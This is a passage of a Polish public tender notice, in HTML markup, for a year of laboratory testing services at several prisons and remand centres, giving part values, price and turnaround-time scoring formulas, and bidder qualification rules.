Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 4 – Badania Laboratoryjne dla Zakładu Karnego w Garbalinie, Garbalin 18, 99-100 Łęczyca; NIP: 775-105-83-57, </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 17842,34 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71900000-7 - Usługi laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich znaczeniem:<br/><br/><br/>Nr<br/>Kryteria<br/>Waga kryterium<br/>1.<br/>Cena<br/>60 %<br/>2.<br/>Kryterium czas wykonania badania <br/>40 %<br/>Kryterium: cena - waga kryterium 60%, zostanie wyliczony na podstawie następującego wzoru:<br/><br/> najniższa cena brutto spośród oferowanych<br/>A = ----------------------------------------------------------- x 60<br/> cena brutto oferty badanej<br/><br/>23.2. Kryterium: czas wykonania badania - 40%, które zostanie wyliczone na podstawie następującego zestawienia i wzoru:<br/><br/>23.2.1 W poszczególnych częściach przetargowych 1-9 występują określone badania, które będą oceniane pod względem zaproponowanego czasu realizacji tych określonych badań. W formularzu cenowym dotyczącym danej części w stosunku do tych badań pozostawiono puste miejsca, w miejscu wskazanym na termin ich realizacji. Wykonawca ubiegając się o realizację danej części musi zaproponować termin realizacji tych wskazanych badań od 1 do 3 dni roboczych – termin liczony jest od dnia następującego po dniu odbioru materiału do wykonania badania tj. w biegu terminu nie uwzględnia się dnia w którym odebrano materiał do badania. Zrealizowanie badania w terminie oznacza wykonanie badania i umieszczenie wyników badania online (§2 ust.7 projektu umowy). Termin maksymalny realizacji tych określonych badań wynosi 3 dni robocze. <br/>23.2.2 Wykonawca za poszczególne badania otrzyma:<br/>40 pkt. - zaproponowany czas realizacji badania –1 dzień roboczy <br/>20 pkt. - zaproponowany czas realizacji badania –2 dni robocze <br/>0 pkt. - zaproponowany czas realizacji badania - 3 dni robocze.<br/><br/>23.2.3. Następnie nastąpi przeliczenie według wzoru:<br/><br/> suma punktów przyznana za poszczególne badania, co do których pozostawiono puste miejsca w formularzu cenowym na daną część zgodnie z zaproponowanym czasem realizacji badania <br/>B = ---------------------------------------------------------------------------------------------------------------------------<br/> liczba badań w formularzu cenowym za daną część co do których pozostawiono puste miejsca celem ich wypełnienia celem wskazania terminu badania. <br/><br/>B –ilość punktów przyznana w ramach niniejszego kryterium</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wykonania badania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 5 – Badania Laboratoryjne dla Zakładu Karnego w Łowiczu, ul. Wiejska 3, 99-400 Łowicz; NIP: 834-100-80-76, </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 17579,99 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71900000-7 - Usługi laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich znaczeniem:<br/><br/><br/>Nr<br/>Kryteria<br/>Waga kryterium<br/>1.<br/>Cena<br/>60 %<br/>2.<br/>Kryterium czas wykonania badania <br/>40 %<br/>Kryterium: cena - waga kryterium 60%, zostanie wyliczony na podstawie następującego wzoru:<br/><br/> najniższa cena brutto spośród oferowanych<br/>A = ----------------------------------------------------------- x 60<br/> cena brutto oferty badanej<br/><br/>23.2. Kryterium: czas wykonania badania - 40%, które zostanie wyliczone na podstawie następującego zestawienia i wzoru:<br/><br/>23.2.1 W poszczególnych częściach przetargowych 1-9 występują określone badania, które będą oceniane pod względem zaproponowanego czasu realizacji tych określonych badań. W formularzu cenowym dotyczącym danej części w stosunku do tych badań pozostawiono puste miejsca, w miejscu wskazanym na termin ich realizacji. Wykonawca ubiegając się o realizację danej części musi zaproponować termin realizacji tych wskazanych badań od 1 do 3 dni roboczych – termin liczony jest od dnia następującego po dniu odbioru materiału do wykonania badania tj. w biegu terminu nie uwzględnia się dnia w którym odebrano materiał do badania. Zrealizowanie badania w terminie oznacza wykonanie badania i umieszczenie wyników badania online (§2 ust.7 projektu umowy). Termin maksymalny realizacji tych określonych badań wynosi 3 dni robocze. <br/>23.2.2 Wykonawca za poszczególne badania otrzyma:<br/>40 pkt. - zaproponowany czas realizacji badania –1 dzień roboczy <br/>20 pkt. - zaproponowany czas realizacji badania –2 dni robocze <br/>0 pkt. - zaproponowany czas realizacji badania - 3 dni robocze.<br/><br/>23.2.3. Następnie nastąpi przeliczenie według wzoru:<br/><br/> suma punktów przyznana za poszczególne badania, co do których pozostawiono puste miejsca w formularzu cenowym na daną część zgodnie z zaproponowanym czasem realizacji badania <br/>B = ---------------------------------------------------------------------------------------------------------------------------<br/> liczba badań w formularzu cenowym za daną część co do których pozostawiono puste miejsca celem ich wypełnienia celem wskazania terminu badania. <br/><br/>B –ilość punktów przyznana w ramach niniejszego kryterium</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wykonania badania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 6 – Badania Laboratoryjne dla Zakładu Karnego w Sieradzu, ul. Orzechowa 5, 98-200 Sieradz; NIP: 827-106-40-51 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 22627,67 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71900000-7 - Usługi laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich znaczeniem:<br/><br/><br/>Nr<br/>Kryteria<br/>Waga kryterium<br/>1.<br/>Cena<br/>60 %<br/>2.<br/>Kryterium czas wykonania badania <br/>40 %<br/>Kryterium: cena - waga kryterium 60%, zostanie wyliczony na podstawie następującego wzoru:<br/><br/> najniższa cena brutto spośród oferowanych<br/>A = ----------------------------------------------------------- x 60<br/> cena brutto oferty badanej<br/><br/>23.2. Kryterium: czas wykonania badania - 40%, które zostanie wyliczone na podstawie następującego zestawienia i wzoru:<br/><br/>23.2.1 W poszczególnych częściach przetargowych 1-9 występują określone badania, które będą oceniane pod względem zaproponowanego czasu realizacji tych określonych badań. W formularzu cenowym dotyczącym danej części w stosunku do tych badań pozostawiono puste miejsca, w miejscu wskazanym na termin ich realizacji. Wykonawca ubiegając się o realizację danej części musi zaproponować termin realizacji tych wskazanych badań od 1 do 3 dni roboczych – termin liczony jest od dnia następującego po dniu odbioru materiału do wykonania badania tj. w biegu terminu nie uwzględnia się dnia w którym odebrano materiał do badania. Zrealizowanie badania w terminie oznacza wykonanie badania i umieszczenie wyników badania online (§2 ust.7 projektu umowy). Termin maksymalny realizacji tych określonych badań wynosi 3 dni robocze. <br/>23.2.2 Wykonawca za poszczególne badania otrzyma:<br/>40 pkt. - zaproponowany czas realizacji badania –1 dzień roboczy <br/>20 pkt. - zaproponowany czas realizacji badania –2 dni robocze <br/>0 pkt. - zaproponowany czas realizacji badania - 3 dni robocze.<br/><br/>23.2.3. Następnie nastąpi przeliczenie według wzoru:<br/><br/> suma punktów przyznana za poszczególne badania, co do których pozostawiono puste miejsca w formularzu cenowym na daną część zgodnie z zaproponowanym czasem realizacji badania <br/>B = ---------------------------------------------------------------------------------------------------------------------------<br/> liczba badań w formularzu cenowym za daną część co do których pozostawiono puste miejsca celem ich wypełnienia celem wskazania terminu badania. <br/><br/>B –ilość punktów przyznana w ramach niniejszego kryterium</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wykonania badania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 7 – Badania Laboratoryjne dla Areszt Śledczy w Ostrowie Wielkopolskim , ul. Kardynała Ledóchowskiego 1 , 63-400 Ostrów Wlkp. NIP 622-179-78-62 wraz z Oddziałem Zewnętrznym Aresztu Śledczego w Ostrowie Wielkopolskim , ul.29 Pułku Piechoty 62-800 Kalisz NIP 6221797862 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 4639,25 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71900000-7 - Usługi laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich znaczeniem:<br/><br/><br/>Nr<br/>Kryteria<br/>Waga kryterium<br/>1.<br/>Cena<br/>60 %<br/>2.<br/>Kryterium czas wykonania badania <br/>40 %<br/>Kryterium: cena - waga kryterium 60%, zostanie wyliczony na podstawie następującego wzoru:<br/><br/> najniższa cena brutto spośród oferowanych<br/>A = ----------------------------------------------------------- x 60<br/> cena brutto oferty badanej<br/><br/>23.2. Kryterium: czas wykonania badania - 40%, które zostanie wyliczone na podstawie następującego zestawienia i wzoru:<br/><br/>23.2.1 W poszczególnych częściach przetargowych 1-9 występują określone badania, które będą oceniane pod względem zaproponowanego czasu realizacji tych określonych badań. W formularzu cenowym dotyczącym danej części w stosunku do tych badań pozostawiono puste miejsca, w miejscu wskazanym na termin ich realizacji. Wykonawca ubiegając się o realizację danej części musi zaproponować termin realizacji tych wskazanych badań od 1 do 3 dni roboczych – termin liczony jest od dnia następującego po dniu odbioru materiału do wykonania badania tj. w biegu terminu nie uwzględnia się dnia w którym odebrano materiał do badania. Zrealizowanie badania w terminie oznacza wykonanie badania i umieszczenie wyników badania online (§2 ust.7 projektu umowy). Termin maksymalny realizacji tych określonych badań wynosi 3 dni robocze. <br/>23.2.2 Wykonawca za poszczególne badania otrzyma:<br/>40 pkt. - zaproponowany czas realizacji badania –1 dzień roboczy <br/>20 pkt. - zaproponowany czas realizacji badania –2 dni robocze <br/>0 pkt. - zaproponowany czas realizacji badania - 3 dni robocze.<br/><br/>23.2.3. Następnie nastąpi przeliczenie według wzoru:<br/><br/> suma punktów przyznana za poszczególne badania, co do których pozostawiono puste miejsca w formularzu cenowym na daną część zgodnie z zaproponowanym czasem realizacji badania <br/>B = ---------------------------------------------------------------------------------------------------------------------------<br/> liczba badań w formularzu cenowym za daną część co do których pozostawiono puste miejsca celem ich wypełnienia celem wskazania terminu badania. <br/><br/>B –ilość punktów przyznana w ramach niniejszego kryterium</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wykonania badania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 8– Badania Laboratoryjne dla Zakład Karny w Kluczborku ul. Katowicka 4, 46-200 Kluczbork ; NIP: 751-103-65-40, wraz z Oddziałem Zenętrznym w Sierakowie Śląskim Zakładu Karnego w Kluczborku Sieraków Śląski ul. Cegielniana 13 42-793 Sieraków Śląsk; NIP: 751-10-36-540 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 20514,19 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71900000-7 - Usługi laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich znaczeniem:<br/><br/><br/>Nr<br/>Kryteria<br/>Waga kryterium<br/>1.<br/>Cena<br/>60 %<br/>2.<br/>Kryterium czas wykonania badania <br/>40 %<br/>Kryterium: cena - waga kryterium 60%, zostanie wyliczony na podstawie następującego wzoru:<br/><br/> najniższa cena brutto spośród oferowanych<br/>A = ----------------------------------------------------------- x 60<br/> cena brutto oferty badanej<br/><br/>23.2. Kryterium: czas wykonania badania - 40%, które zostanie wyliczone na podstawie następującego zestawienia i wzoru:<br/><br/>23.2.1 W poszczególnych częściach przetargowych 1-9 występują określone badania, które będą oceniane pod względem zaproponowanego czasu realizacji tych określonych badań. W formularzu cenowym dotyczącym danej części w stosunku do tych badań pozostawiono puste miejsca, w miejscu wskazanym na termin ich realizacji. Wykonawca ubiegając się o realizację danej części musi zaproponować termin realizacji tych wskazanych badań od 1 do 3 dni roboczych – termin liczony jest od dnia następującego po dniu odbioru materiału do wykonania badania tj. w biegu terminu nie uwzględnia się dnia w którym odebrano materiał do badania. Zrealizowanie badania w terminie oznacza wykonanie badania i umieszczenie wyników badania online (§2 ust.7 projektu umowy). Termin maksymalny realizacji tych określonych badań wynosi 3 dni robocze. <br/>23.2.2 Wykonawca za poszczególne badania otrzyma:<br/>40 pkt. - zaproponowany czas realizacji badania –1 dzień roboczy <br/>20 pkt. - zaproponowany czas realizacji badania –2 dni robocze <br/>0 pkt. - zaproponowany czas realizacji badania - 3 dni robocze.<br/><br/>23.2.3. Następnie nastąpi przeliczenie według wzoru:<br/><br/> suma punktów przyznana za poszczególne badania, co do których pozostawiono puste miejsca w formularzu cenowym na daną część zgodnie z zaproponowanym czasem realizacji badania <br/>B = ---------------------------------------------------------------------------------------------------------------------------<br/> liczba badań w formularzu cenowym za daną część co do których pozostawiono puste miejsca celem ich wypełnienia celem wskazania terminu badania. <br/><br/>B –ilość punktów przyznana w ramach niniejszego kryterium</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wykonania badania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 9 – Badania Laboratoryjne dla Zakład Karny we Włocławku ul. Bartnicka 10, 87-809 Włocławek, NIP: 888-102-68-18 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 49076,39 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71900000-7 - Usługi laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich znaczeniem:<br/><br/><br/>Nr<br/>Kryteria<br/>Waga kryterium<br/>1.<br/>Cena<br/>60 %<br/>2.<br/>Kryterium czas wykonania badania <br/>40 %<br/>Kryterium: cena - waga kryterium 60%, zostanie wyliczony na podstawie następującego wzoru:<br/><br/> najniższa cena brutto spośród oferowanych<br/>A = ----------------------------------------------------------- x 60<br/> cena brutto oferty badanej<br/><br/>23.2. Kryterium: czas wykonania badania - 40%, które zostanie wyliczone na podstawie następującego zestawienia i wzoru:<br/><br/>23.2.1 W poszczególnych częściach przetargowych 1-9 występują określone badania, które będą oceniane pod względem zaproponowanego czasu realizacji tych określonych badań. W formularzu cenowym dotyczącym danej części w stosunku do tych badań pozostawiono puste miejsca, w miejscu wskazanym na termin ich realizacji. Wykonawca ubiegając się o realizację danej części musi zaproponować termin realizacji tych wskazanych badań od 1 do 3 dni roboczych – termin liczony jest od dnia następującego po dniu odbioru materiału do wykonania badania tj. w biegu terminu nie uwzględnia się dnia w którym odebrano materiał do badania. Zrealizowanie badania w terminie oznacza wykonanie badania i umieszczenie wyników badania online (§2 ust.7 projektu umowy). Termin maksymalny realizacji tych określonych badań wynosi 3 dni robocze. <br/>23.2.2 Wykonawca za poszczególne badania otrzyma:<br/>40 pkt. - zaproponowany czas realizacji badania –1 dzień roboczy <br/>20 pkt. - zaproponowany czas realizacji badania –2 dni robocze <br/>0 pkt. - zaproponowany czas realizacji badania - 3 dni robocze.<br/><br/>23.2.3. Następnie nastąpi przeliczenie według wzoru:<br/><br/> suma punktów przyznana za poszczególne badania, co do których pozostawiono puste miejsca w formularzu cenowym na daną część zgodnie z zaproponowanym czasem realizacji badania <br/>B = ---------------------------------------------------------------------------------------------------------------------------<br/> liczba badań w formularzu cenowym za daną część co do których pozostawiono puste miejsca celem ich wypełnienia celem wskazania terminu badania. <br/><br/>B –ilość punktów przyznana w ramach niniejszego kryterium</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wykonania badania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy wobec których nie zachodzi podstawa do wykluczenia z postępowania o których mowa w art. 108 ust.1 oraz 109 ust. 1 pkt. 4 i 5 ustawy Pzp oraz spełniają warunki udziału w postępowaniu określone w art. 112 ust. 2 ustawy dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów Wykonawca spełni warunek, jeżeli: Za spełniających ten warunek zamawiający uzna tych wykonawców, którzy posiadają: aktualny wpis do rejestru podmiotów wykonujących działalność leczniczą.<br/><br/>3) sytuacji ekonomicznej lub finansowej;<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>4) zdolności technicznej lub zawodowej<br/>Zamawiający nie stawia warunku w powyższym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Do oferty Wykonawca ma dołączyć aktualne na dzień składania ofert oświadczenia :<br/>13.1. Formularz ofertowy wypełniony i podpisany przez wykonawcę z wykorzystaniem wzoru – załącznik nr 1 do SWZ, formularz cenowy pakietu na który wykonawca składa ofertę Załączniki od nr 2 do 10 do SWZ.<br/>13.2. Dokumenty potwierdzające posiadanie uprawnień do reprezentowania wykonawcy, pełnomocnictw osób składających ofertę, o ile fakt ten nie wynika z dokumentów rejestrowych<br/>13.3. Oświadczenie, o którym mowa w art. 125 ust.1 Pzp - o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez zamawiającego (wzór oświadczenia zawarty został w formularzu ofertowym stanowiącym załącznik nr 1 do SWZ)<br/>13.4. Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>1) Odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust.1 pkt 4 ustawy – sporządzonego nie wcześniej niż na 3 miesiące przed złożeniem<br/>2) wpis do rejestru podmiotów wykonujących działalność leczniczą.<br/>13.5. Zamawiający informuje, że jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie zamówienia publicznego, może na każdym etapie postępowania wezwać wykonawców do złożenia wszystkich lub niektórych oświadczeń lub dokumentów potwierdzających, że nie podlegają wykluczeniu, spełniają warunki udziału w postępowaniu ,a jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio oświadczenia lub dokumenty nie są już aktualne, do złożenia aktualnych oświadczeń lub dokumentów.<br/>13.6. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, dane umożliwiające dostęp do tych środków.<br/>13.7. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w art. 125 ust.1 ustawy Pzp oraz dokumenty potwierdzające brak podstaw do wykluczenia składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. W przypadku wskazanym w art. 117 ust.4 ustawy Pzp wykonawcy wspólnie ubiegający się o udzielenie 